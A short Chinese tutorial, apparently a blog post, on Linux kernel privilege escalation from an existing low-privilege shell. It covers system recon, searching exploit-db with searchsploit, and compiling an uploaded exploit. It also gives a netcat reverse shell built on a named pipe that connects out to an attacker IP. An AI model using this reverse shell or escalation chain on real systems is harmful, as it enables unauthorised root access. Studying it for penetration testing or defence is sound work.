前提:
已经拿到低权shell
被入侵的机器上面有nc,python,perl等linux非常常见的工具
有权限上传文件和下载文件
内核漏洞提权
内核漏洞是我们几乎最先想到的提权方法。通杀的内核漏洞是十分少见的,因而我们应该先对系统相关的信息进行收集。
第一步
查看linux版本信息
cat /etc/issuecat /etc/*-release
查看内核版本
uname -a
这里我找了台机器测试:
#uname -aLinux xxxxx 2.6.32-21-generic-pae #32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux#cat /etc/*-releaseDISTRIB_ID=UbuntuDISTRIB_RELEASE=10.04DISTRIB_CODENAME=lucidDISTRIB_DESCRIPTION=”Ubuntu 10.04 LTS”
这样,我们就得到了系统的内核版本(2.6.32-21 pae),cpu架构(i686),和发行版(ubuntu 10.04)
可以开始搜索了
大多内核漏洞通过内核版本能很快查到
第二步
用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码
searchspoit linux 2.6 ubuntu priv esc
找到需要的.c文件
第三步
将.c文件上传到获得shell的机器上
第四步
在webshell的机器上编译.c 文件
gcc hello.c -o hello
第五步
使用一个可交互的shell,这里使用的nc反弹
攻击方执行:nc -lnvp 4430
被攻击方执行:mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 192.168.xx.xx 4430 1>/tmp/backpipe
第六步
执行.c文件,提升权限 ./hello
id 查看当前权限